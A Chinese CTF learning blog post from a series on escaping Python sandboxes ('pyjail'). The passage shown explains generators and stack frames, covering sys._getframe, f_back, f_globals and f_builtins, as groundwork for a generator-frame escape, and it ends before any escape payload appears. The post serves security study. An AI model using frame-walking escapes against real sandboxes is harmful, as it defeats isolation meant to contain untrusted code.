      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>
/style><<!doctype html>

<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="light">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta property="og:locale" content="en" />
<meta name="description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<meta property="og:description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<link rel="canonical" href="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:url" content="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:site_name" content="DummyKitty’s Blog" />
<meta property="og:image" content="/assets/images/pyjail.jpg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-09T14:23:57+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/images/pyjail.jpg" />
<meta property="twitter:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta name="twitter:site" content="@DummyKitty" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-04-02T00:46:04+00:00","datePublished":"2024-11-09T14:23:57+00:00","description":"pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈","headline":"pyjail bypass-11 利用生成器栈逃逸","image":"/assets/images/pyjail.jpg","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"},"url":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"}</script>
<!-- End Jekyll SEO tag -->

  <title>pyjail bypass-11 利用生成器栈逃逸 | DummyKitty's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->

<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="DummyKitty's Blog">
<meta name="application-name" content="DummyKitty's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

  <!-- Resource Hints -->
  
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
  <!-- Bootstrap -->
  
  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  
  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->

<!-- layout specified -->

    <!-- image lazy-loading & popup & clipboard -->
    
  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>

<script defer src="/assets/js/dist/post.min.js"></script>

<!-- Pageviews -->

    <!-- PWA -->
    
      <script
        defer
        src="/app.min.js?baseurl=&register=true"
      ></script>
    
    <!-- Web Analytics -->
    
  <!-- A placeholder to allow defining custom metadata -->

</head>

  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/images/me.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">DummyKitty's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Code Audit@xxx / Penetration Tester@xxx / CTFer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            
            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            
            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            
            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            
            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
        <a
          href="https://github.com/DummyKitty"
          aria-label="github"
          
            target="_blank"
            
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
        <a
          href="/feed.xml"
          aria-label="rss"
          
        >
          <i class="fas fa-rss"></i>
        </a>
      
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->

    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      
            <span>
              <a href="/">Home</a>
            </span>

              <span>pyjail bypass-11 利用生成器栈逃逸</span>
            
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->

<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->

<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->

<!-- Change the icon of checkbox -->

<!-- Handle images -->

    <!-- take out classes -->
    
    <!-- lazy-load images -->
    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      
        <!-- create the image wrapper -->
        
    <!-- combine -->
    
<!-- Add header for code snippets -->

<!-- Create heading anchors -->

<!-- return -->

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>pyjail bypass-11 利用生成器栈逃逸</h1>
    
    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1731162237"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Nov  9, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1743554764"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr  2, 2025
</time>

        </span>
      
        <div class="mt-3 mb-3">
          <a href="/assets/images/pyjail.jpg" class="popup img-link preview-img shimmer"><img src="/assets/images/pyjail.jpg"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      
      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          
          By

          <em>
            
              <a href="https://twitter.com/DummyKitty">DummyKitty</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          
          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->

<!-- words per minute -->

<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2817 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">pyjail bypass-11 利用生成器栈逃逸</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">pyjail bypass-11 利用生成器栈逃逸</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  
  <div class="content">
    <blockquote>
  <ul>
    <li><a href="/posts/python-沙箱逃逸原理/">pyjail 沙箱逃逸原理</a></li>
    <li><a href="/posts/pyjail-bypass-01-绕过删除模块或方法/">绕过删除模块或方法</a></li>
    <li><a href="/posts/pyjail-bypass-02-字符串变换绕过/">绕过基于字符串匹配的过滤</a></li>
    <li><a href="/posts/pyjail-bypass-03-绕过命名空间限制/">绕过命名空间限制</a></li>
    <li><a href="/posts/pyjail-bypass-05-绕过长度限制/">绕过多行限制</a></li>
    <li><a href="/posts/pyjail-bypass-04-绕过多行限制/">绕过长度限制</a></li>
    <li><a href="/posts/pyjail-bypass-06-变量覆盖与函数篡改/">变量覆盖与函数篡改</a></li>
    <li><a href="/posts/pyjail-bypass-07-绕过-audit-hook/">绕过 audit hook</a></li>
    <li><a href="/posts/pyjail-bypass-08-绕过-AST-沙箱/">绕过 AST 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-09-绕过输出限制/">绕过输出限制</a></li>
    <li><a href="/posts/pyjail-bypass-10-绕过-opcode-沙箱/">绕过 opcode 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-11-利用生成器栈/">利用生成器栈</a></li>
  </ul>
</blockquote>

<p>本文仅作为个人学习记录，大部分参考自下面的文章，讲解得非常细致：</p>
<ul>
  <li><a href="https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern">利用生成器栈帧逃逸 Pyjail - CISCN 2024 mossfern 题解</a></li>
</ul>

<h2 id="利用生成器栈帧进行逃逸"><span class="me-2">利用生成器栈帧进行逃逸</span><a href="#利用生成器栈帧进行逃逸" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="生成器"><span class="me-2">生成器</span><a href="#生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>在 Python 中，生成器（Generator）是一种特殊的迭代器，它能够逐个生成值，而不需要一次性将所有值存储在内存中。生成器的主要特点是它们能够 惰性计算，即按需生成数据，这使得它们在处理大量数据或无限序列时非常高效。</p>

<p>生成器通过使用 yield 关键字来返回值，而不是像普通函数那样使用 return。当一个函数包含 yield 时，它就成为了一个生成器函数。调用这个函数不会立即执行，而是返回一个生成器对象。每次调用生成器对象的 next() 方法时，函数会从上次暂停的地方继续执行，直到再次遇到 yield 或结束。</p>
<h4 id="创建生成器"><span class="me-2">创建生成器</span><a href="#创建生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>创建生成器有以下两种方法：</p>
<ol>
  <li>使用 yield 关键字
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre> <span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
     <span class="k">yield</span> <span class="mi">1</span>
     <span class="k">yield</span> <span class="mi">2</span>
     <span class="k">yield</span> <span class="mi">3</span>

 <span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span> <span class="c1"># &lt;class 'generator'&gt;
</span> <span class="nf">print</span><span class="p">(</span><span class="n">gen</span><span class="p">)</span>       <span class="c1"># &lt;generator object my_generator at 0x7f4a20e049e0&gt;
</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span></pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>使用生成器表达式。类似于列表推导式，但使用小括号 () 而不是方括号 [] 来创建生成器表达式。
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre> <span class="n">gen_exp</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">x</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">5</span><span class="p">))</span>

 <span class="k">for</span> <span class="n">num</span> <span class="ow">in</span> <span class="n">gen_exp</span><span class="p">:</span>
     <span class="nf">print</span><span class="p">(</span><span class="n">num</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div>    </div>
    <h4 id="生成器转化为列表"><span class="me-2">生成器转化为列表</span><a href="#生成器转化为列表" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
    <p>生成器转换为列表可以使用如下的几种方式：</p>
  </li>
  <li>list 构造函数</li>
  <li>列表推导式</li>
  <li><code class="language-plaintext highlighter-rouge">*</code> 解包操作符
```py
gen = (x for x in range(5))<br />
lst = list(gen)</li>
</ol>

<p>gen = (x for x in range(5))<br />
lst = [x for x in gen]</p>

<p>gen = (x for x in range(5))<br />
lst = [*gen]</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>

### 栈帧
在 Python 中，栈帧（Stack Frame）是每次函数调用时创建的执行上下文。每个栈帧包含了函数的局部变量、参数、返回地址等信息，并且这些栈帧按照调用顺序被压入 调用栈（Call Stack）中。

#### 获取栈帧
获取栈帧的基本方法是使用 sys._getframe 方法：
```py
import sys
f1 = sys._getframe()
print(f1)
# &lt;frame at 0x7fb8d49984a0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack.py', line 3, code &lt;module&gt;&gt;
print(type(f1)) # &lt;class 'frame'&gt;
</pre></td></tr></tbody></table></code></div></div>
<p>f1 就是一个栈帧对象。</p>

<p>另一种方法是用 inspect 库的 currentframe 方法</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">inspect</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="nf">currentframe</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="交互式命令行的差异"><span class="me-2">交互式命令行的差异</span><a href="#交互式命令行的差异" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>注意，由于 Python 交互式命令行在执行代码时会使用单独的栈帧，因此下面的代码在交互式命令行与脚本文件中执行的结果不同。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">&gt;&gt;&gt;</span> <span class="kn">import</span> <span class="n">sys</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span>
<span class="bp">False</span>
</pre></td></tr></tbody></table></code></div></div>
<p>直接执行脚本文件时返回 True</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">f1</span><span class="p">))</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span><span class="p">)</span> <span class="c1"># True
</span></pre></td></tr></tbody></table></code></div></div>
<h4 id="栈帧工作原理"><span class="me-2">栈帧工作原理</span><a href="#栈帧工作原理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>栈帧的工作原理如下：</p>
<ol>
  <li>当程序开始执行时，会创建一个==全局帧（global frame）==，它是整个程序的顶层上下文。</li>
  <li>每当==调用一个函数时，Python 会创建一个新的栈帧，并将其压入调用栈顶部==。</li>
  <li>==当函数完成执行后，当前栈帧会被弹出，并将控制权返回给上一个栈帧==。</li>
  <li>这种过程持续进行，直到所有函数都执行完毕，最终回到全局帧。</li>
</ol>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">global frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">add() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">multiply() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># global frame: &lt;frame at 0x7f5793d5a400, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 3, code &lt;module&gt;&gt;
# multiply() frame: &lt;frame at 0x7f5793d35480, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 11, code multiply&gt;
# add() frame: &lt;frame at 0x7f5793d34940, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 6, code add&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="栈帧的内容"><span class="me-2">栈帧的内容</span><a href="#栈帧的内容" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>使用 dir 查看栈帧的内容：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="nf">dir</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__delattr__',
#  '__dir__',
#  '__doc__',
#  '__eq__',
#  '__format__',
#  '__subclasshook__',
#  ...
#  'clear',
#  'f_back',
#  'f_builtins',
#  'f_code',
#  'f_globals',
#  'f_lasti',
#  'f_lineno',
#  'f_locals',
#  'f_trace',
#  'f_trace_lines',
#  'f_trace_opcodes']
</span></pre></td></tr></tbody></table></code></div></div>
<p>除了 Object 共有的属性之外，有一些 f_ 开头的属性是栈帧对象独有的。</p>
<ul>
  <li>f_back：它是指向上一个栈帧的指针。在 Python 中，f1.f_back 拿到的也是一个栈帧对象。</li>
  <li>f_builtins、f_globals、f_locals：对应着当前栈帧的 builtins、globals、locals 对象。</li>
</ul>

<p>我们可以使用前面的脚本进行测试：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">global_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="n">multiply_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="n">add_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="c1"># print(f"global frame: {global_frame}")
</span><span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">add_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"add() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">multiply_frame</span> <span class="o">==</span> <span class="n">add_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">multiply_frame</span>
    <span class="n">multiply_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"multiply() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">global_frame</span> <span class="o">==</span> <span class="n">multiply_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>
